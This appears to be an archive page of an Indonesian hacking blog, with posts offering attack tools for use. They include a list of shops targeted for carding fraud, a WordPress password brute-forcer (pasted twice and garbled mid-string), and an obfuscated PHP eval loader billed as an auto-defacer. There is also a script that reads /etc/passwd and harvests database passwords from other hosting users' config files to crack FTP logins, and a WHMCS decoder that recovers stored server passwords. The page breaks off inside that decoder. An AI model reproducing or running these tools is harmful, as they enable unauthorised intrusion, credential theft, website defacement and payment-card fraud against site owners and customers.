Home » Archives for 2012

deface page creator

Posted by Yas Tuesday 11 December 2012 0 comments
jika anda seorang hacker (defacer), tentunya anda  membutuhkan deface page untuk di upload ke web deface anda, dan anda harus pintar bahasa HTML,
nah, jika anda tidak tau cara membuatnya, saya punya tools yang cocok untuk anda :D

SCREENSHOT :




DAN, HASILNYA ...

GOOD LUCK !!

DOWNLOAD HERE

Cardable shoplist

Posted by Yas Wednesday 14 November 2012 0 comments

http://de.europe.creative.com/shop/
www.conrad.de
www.sonyericsson-shop.de
www.sonystyle.de 
www.sheesha24.de
www.thehookah.com
www.uhrzeit.org
www.vodkahaus.de
www.sensiseeds.com
www.greenhouseseeds.nl/shop/
www.thalia.de
www.eukasa.de 
www.pc-cooling.de
www.ipc-computer.de
www.messerundmehr.de
www.metaltix.com 
www.nuclearblast.de
www.ichwillkaffee.de
www.angelsport.de 
www.alternate.de
www.x-tra-x.de/
www.titus.de
www.sportloebl.de/index.php
www.games-workshop.com/
www.gwindi.net
www.kotte-zeller.de
www.quelle.de 
www.fleshlight-shop.de
www.ticket-online.de
www.elevator.de/ 
www.bankowski.de
www.jowenga.com/shop/
www.thejewellershop.com/
www.buyplanet.de 
www.sip-scootershop.de
www.scootercenter.de
www.racing-planet.de
www.printus24home.de
www.hifistudio.de
www.myby.com
www.actionsports.de
www.sportuhren.de
https://www.ebrosia.de
www.watchoo.com
http://www.pharmatheke.com
www.technikdirekt.de
www.plus.de
www.conrad.de
www.doit24.de
www.alternate.de
www.temeon.de
www.medionshop.de
www.passiontec.de
www.epson.de
www.iphoneohnevertrag.com
www.worldofsweets.de
www.apple.de
www.caraudio-versand.de
www.neckermann.de
www.qvc.de

cPanel WHM Account Creator 1.1

Posted by Yas 0 comments
<?php  ############################################################### # cPanel WHM Account Creator 1.1 ############################################################### # Visit http://www.zubrag.com/scripts/ for updates ############################################################### # Required parameters: # - domain - new account domain # - user - new account username # - password - new account password # - package - new account hosting package (plan) # - email - contact email # # Sample run: create-whm-account.php?domain=reseller.com&user=hosting&password=manager&package=unix_500 # # If no parameters passed then input form will be shown to enter data. # # This script can also be run from another PHP script. This may # be helpful if you have some user interface already in place and  # want to automatically create WHM accounts from there. # In this case you have to setup following variables instead of # passing them as parameters: # - $user_domain - new account domain # - $user_name - new account username # - $user_pass - new account password # - $user_plan - new account hosting package (plan) # - $user_email - contact email # ###############################################################  ///////  YOUR WHM LOGIN DATA $whm_user   = "root";      // reseller username $whm_pass   = "password";  // the password you use to login to WHM  ##################################################################################### ##############          END OF SETTINGS. DO NOT EDIT BELOW    ####################### #####################################################################################  $whm_host   = $_SERVER['HTTP_HOST'];  function getVar($name, $def = '') {   if (isset($_REQUEST[$name]))     return $_REQUEST[$name];   else     return $def; }  // Domain name of new hosting account // To create subdomain just pass full subdomain name // Example: newuser.zubrag.com if (!isset($user_domain)) {   $user_domain = getVar('domain'); }  // Username of the new hosting account if (!isset($user_name)) {   $user_name = getVar('user'); }  // Password for the new hosting account if (!isset($user_pass)) {   $user_pass = getVar('password'); }  // New hosting account Package if (!isset($user_plan)) {   $user_plan = getVar('package'); }  // Contact email if (!isset($user_email)) {   $user_email = getVar('email'); }  // if parameters passed then create account if (!empty($user_name)) {    // create account on the cPanel server   $script = "http://{$whm_user}:{$whm_pass}@{$whm_host}:2086/scripts/wwwacct";   $params = "?plan={$user_plan}&domain={$user_domain}&username={$user_name}&password={$user_pass}&contactemail={$user_email}";   $result = file_get_contents($script.$params);    // output result   echo "RESULT: " . $result; } // otherwise show input form else { $frm = <<<EOD <html> <head>   <title>cPanel/WHM Account Creator</title>   <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">   <META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> </head> <body>   <style>     input { border: 1px solid black; }   </style> <form method="post"> <h3>cPanel/WHM Account Creator</h3> <table border="0"> <tr><td>Domain:</td><td><input name="domain" size="30"></td><td>Subdomain or domain, without www</td></tr> <tr><td>Username:</td><td><input name="user" size="30"></td><td>Username to be created</td></tr> <tr><td>Password:</td><td><input name="password" size="30"></td><td></td></tr> <tr><td>Package:</td><td><input name="package" size="30"></td><td>Package (hosting plan) name. Make sure you cpecify existing package</td></tr> <tr><td>Contact Email:</td><td><input name="email" size="30"></td><td></td></tr> <tr><td colspan="3"><br /><input type="submit" value="Create Account"></td></tr> </table> </form> </body> </html> EOD; echo $frm; }  ?>

 ENJOY :D

wordpress bruteforce script in python

Posted by Yas 0 comments
#!/usr/bin/python

#WordPress Brute Force (wp-login.php)

 

#If cookies enabled brute force will not work (yet)

#Change response on line 97 if needed. (language)

 

#Dork: inurl:wp-login.php

 

#http://www.darkc0de.com

#d3hydr8[at]gmail[dot]com 

 

import urllib2, sys, re, urllib, httplib, socket

 

print "\n   d3hydr8[at]gmail[dot]com WordPressBF "

print "----------------------------------------------"

 

if len(sys.argv) not in [4,5,6,7]:

        print "Usage: ./wordpressbf.py <site> <user> <wordlist> <options>\#!/usr/bin/python

#WordPress Brute Force (wp-login.php)

 

#If cookies enabled brute force will not work (yet)

#Change response on line 97 if needed. (language)

 

#Dork: inurl:wp-login.php

 

#http://www.darkc0de.com

#ilyasrobert[at]gmail[dot]com 

 

import urllib2, sys, re, urllib, httplib, socket

 

print "\n   ilyasrobert[at]gmail[dot]com WordPressBF "

print "----------------------------------------------"

 

if len(sys.argv) not in [4,5,6,7]:

        print "Usage: ./wordpressbf.py <site> <user> <wordlist> <options>\n"

        print "\t   -p/-proxy <host:port> : Add proxy support"

        print "\t   -v/-verbose : Verbose Mode\n"

        sys.exit(1)

        

for arg in sys.argv[1:]:

        if arg.lower() == "-p" or arg.lower() == "-proxy":

               proxy = sys.argv[int(sys.argv[1:].index(arg))+2]

        if arg.lower() == "-v" or arg.lower() == "-verbose":

               verbose = 1

               

try:

        if proxy:

               print "\n[+] Testing Proxy..."

               h2 = httplib.HTTPConnection(proxy)

               h2.connect()

               print "[+] Proxy:",proxy

except(socket.timeout):

        print "\n[-] Proxy Timed Out"

        proxy = 0

        pass

except(NameError):

        print "\n[-] Proxy Not Given"

        proxy = 0

        pass

except:

        print "\n[-] Proxy Failed"

        proxy = 0

        pass

        

try:

        if verbose == 1:

               print "[+] Verbose Mode On\n"

except(NameError):

        print "[-] Verbose Mode Off\n"

        verbose = 0

        pass

        

if sys.argv[1][:7] != "http://":

        host = "http://"+sys.argv[1]

else:

        host = sys.argv[1]

        

print "[+] BruteForcing:",host

print "[+] User:",sys.argv[2]

 

try:

        words = open(sys.argv[3], "r").readlines()

        print "[+] Words Loaded:",len(words),"\n"

except(IOError): 

        print "[-] Error: Check your wordlist path\n"

        sys.exit(1)

  

for word in words:

        word = word.replace("\r","").replace("\n","")

        login_form_seq = [

        ('log', sys.argv[2]),

        ('pwd', word),

        ('rememberme', 'forever'),

        ('wp-submit', 'Login >>'),

               ('redirect_to', 'wp-admin/')]

        login_form_data = urllib.urlencode(login_form_seq)

        if proxy != 0:

               proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})

               opener = urllib2.build_opener(proxy_handler)

        else:

               opener = urllib2.build_opener()

        try:

               site = opener.open(host, login_form_data).read()

        except(urllib2.URLError), msg:

               print msg

               site = ""

               pass

 

        if re.search("WordPress requires Cookies",site):

               print "[-] Failed: WordPress has cookies enabled\n"

               sys.exit(1)

               

        #Change this response if different. (language)

        if re.search("<strong>ERROR</strong>",site) and verbose == 1:

               print "[-] Login Failed:",word

        else:

               print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"

               sys.exit(1)

print "\n[-] Brute Complete\n"n"

        print "\t   -p/-proxy <host:port> : Add proxy support"

        print "\t   -v/-verbose : Verbose Mode\n"

        sys.exit(1)

        

for arg in sys.argv[1:]:

        if arg.lower() == "-p" or arg.lower() == "-proxy":

               proxy = sys.argv[int(sys.argv[1:].index(arg))+2]

        if arg.lower() == "-v" or arg.lower() == "-verbose":

               verbose = 1

               

try:

        if proxy:

               print "\n[+] Testing Proxy..."

               h2 = httplib.HTTPConnection(proxy)

               h2.connect()

               print "[+] Proxy:",proxy

except(socket.timeout):

        print "\n[-] Proxy Timed Out"

        proxy = 0

        pass

except(NameError):

        print "\n[-] Proxy Not Given"

        proxy = 0

        pass

except:

        print "\n[-] Proxy Failed"

        proxy = 0

        pass

        

try:

        if verbose == 1:

               print "[+] Verbose Mode On\n"

except(NameError):

        print "[-] Verbose Mode Off\n"

        verbose = 0

        pass

        

if sys.argv[1][:7] != "http://":

        host = "http://"+sys.argv[1]

else:

        host = sys.argv[1]

        

print "[+] BruteForcing:",host

print "[+] User:",sys.argv[2]

 

try:

        words = open(sys.argv[3], "r").readlines()

        print "[+] Words Loaded:",len(words),"\n"

except(IOError): 

        print "[-] Error: Check your wordlist path\n"

        sys.exit(1)

  

for word in words:

        word = word.replace("\r","").replace("\n","")

        login_form_seq = [

        ('log', sys.argv[2]),

        ('pwd', word),

        ('rememberme', 'forever'),

        ('wp-submit', 'Login >>'),

               ('redirect_to', 'wp-admin/')]

        login_form_data = urllib.urlencode(login_form_seq)

        if proxy != 0:

               proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})

               opener = urllib2.build_opener(proxy_handler)

        else:

               opener = urllib2.build_opener()

        try:

               site = opener.open(host, login_form_data).read()

        except(urllib2.URLError), msg:

               print msg

               site = ""

               pass

 

        if re.search("WordPress requires Cookies",site):

               print "[-] Failed: WordPress has cookies enabled\n"

               sys.exit(1)

               

        #Change this response if different. (language)

        if re.search("<strong>ERROR</strong>",site) and verbose == 1:

               print "[-] Login Failed:",word

        else:

               print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"

               sys.exit(1)


print "\n[-] Brute Complete\n"


CARA PAKAI:
linux:
./wpbute.py http://site.com/wp-login.php admin common.txt -p 174.143.95.234:80 -v
windows :
wpbute.py http://site.com/wp-login.php admin common.txt -p 174.143.95.234:80 -v
PREVIEW :


[PHP] Mass subdomain maker and auto defacer

Posted by Yas 0 comments

SREENSHOT :

[+] Save wordlist for subdomain in /public_html/ directory and name it as "domains.txt" 


<?php /* coded by force ex  */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};$GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};$GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x18d0;eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDUxMyk7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4MWE4KSwnaWxvdmVhaEhBTEVWT0lCYkNjRGRGZkdnSmpLa01tTm5QcFFxUnJTc1R0VXVXd1h4WXlaejAxMjM0NTY3ODkrLz0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));return;?>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sf[|GL~Y



ENJOY :D

Cpanel/Ftp Cracker Script

Posted by Yas 1 comment

<?php 
echo "<html>"; 
echo "<title>Crack Cpanel/FTP </title><body>"; 

 set_time_limit(0); 
################## 
@$passwd=fopen('/etc/passwd','r'); 
if (!$passwd) { 
   echo "[-] Error : coudn't read /etc/passwd"; 
   exit; 

$path_to_public=array(); 
$users=array(); 
$pathtoconf=array(); 
$i=0; 

 while(!feof($passwd)) { 
  $str=fgets($passwd); 
  if ($i>35) { 
    $pos=strpos($str,":"); 
    $username=substr($str,0,$pos); 
    $dirz="/home/$username/public_html/"; 
    if (($username!="")) { 
        if (is_readable($dirz)) { 
            array_push($users,$username); 
            array_push($path_to_public,$dirz); 
        } 
    } 
  } 
  $i++; 

################### 

 ######################### 
echo "<br><br>"; 
echo "<textarea name='main_window' cols=100 rows=20>"; 

 echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"; 
echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories\n"; 

 echo "[~] Searching for passwords in config.* files...\n\n"; 
foreach ($users as $user) { 
        $path="/home/$user/public_html/"; 
        read_dir($path,$user); 


 echo "\n[+] Done\n"; 

 function read_dir($path,$username) { 
    if ($handle = opendir($path)) { 
        while (false !== ($file = readdir($handle))) { 
              $fpath="$path$file"; 
              if (($file!='.') and ($file!='..')) { 
                 if (is_readable($fpath)) { 
                    $dr="$fpath/"; 
                    if (is_dir($dr)) { 
                       read_dir($dr,$username); 
                    } 
                    else { 
                         if (($file=='config.php') or ($file=='config.inc.php') or ($file=='configuration.inc') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or  ($file=='func.php') or ($file=='fun.php') or ($file=='function.php') or ($file=='settings.php') or ($file=='mysqlconnect.php') or ($file=='mysql.php') or ($file=='configuration.php') or ($file=='db_config.php') or ($file=='db_connect.php')) { 
                            $pass=get_pass($fpath); 
                            if ($pass!='') { 
                               echo "[+] $fpath\n$pass\n"; 
                               ftp_check($username,$pass); 
                            } 
                         } 
                    } 
                 } 
              } 
        } 
    } 


 function get_pass($link) { 
    @$config=fopen($link,'r'); 
    while(!feof($config)) { 
        $line=fgets($config); 
        if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) { 
            if (strrpos($line,'"')) 
               $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3))); 
            else 
               $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3))); 
            return $pass; 
        } 
    } 


 function ftp_check($login,$pass) { 
     @$ftp=ftp_connect('127.0.0.1'); 
     if ($ftp) { 
        @$res=ftp_login($ftp,$login,$pass); 
        if ($res) { 
           echo '[FTP] '.$login.':'.$pass."  Success\n"; 
        } 
        else ftp_quit($ftp); 
     } 


 echo "</textarea><br>"; 
echo "</body></html>"; 
?>  

WHMCS Server Password decoder-Advance script

Posted by Yas 0 comments

<?php

 ###########################################
# WHMCS Server Password decoder #
# #
# recoded by ilyas_robert
#Note : I'm Proud to be ~~h4ck3r~~ #
####################################
function decrypt ($string,$cc_encryption_hash)
{
$key = md5 (md5 ($cc_encryption_hash)) . md5
($cc_encryption_hash);
$hash_key = _hash ($key);
$hash_length = strlen ($hash_key);
$string = base64_decode ($string);
$tmp_iv = substr ($string, 0, $hash_length);
$string = substr ($string, $hash_length, strlen ($string) -
$hash_length);
$iv = $out = '';
$c = 0;
while ($c < $hash_length)
{
$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
++$c;
}
$key = $iv;
$c = 0;
while ($c < strlen ($string))
{
if (($c != 0 AND $c % $hash_length == 0))
{
$key = _hash ($key . substr ($out, $c - $hash_length,
$hash_length));
}
$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string
[$c]));
++$c;
}
return $out;
}
function _hash ($string)
{
if (function_exists ('sha1'))
{
$hash = sha1 ($string);
}
else
{
$hash = md5 ($string);
}
$out = '';
$c = 0;
while ($c < strlen ($hash))
{
$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
$c += 2;
}
return $out;
}
if($_POST['form_action'] == 1 )
{
//include($file);
$file=($_POST['file']);
$****=file_get_contents($file);
$****= str_replace("<?php", "", $****);
$****= str_replace("<?", "", $****);
$****= str_replace("?>", "", $****);
eval($****);
$link=mysql_connect($db_host,$db_user****,$db_pass
word) ;
mysql_select_db($db_****,$link) ;
$query = mysql_query("SELECT * FROM tblservers");
while($v = mysql_fetch_array($query)) {
$ipaddress = $v['ipaddress'];
$user**** = $v['user****'];
$type = $v['type'];
$active = $v['active'];
$host**** = $v['host****'];
echo("<center><table border='1'>");
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>Type</td><td>$type</td></tr>");
echo("<tr><td>Active</td><td>$active</td></tr>");
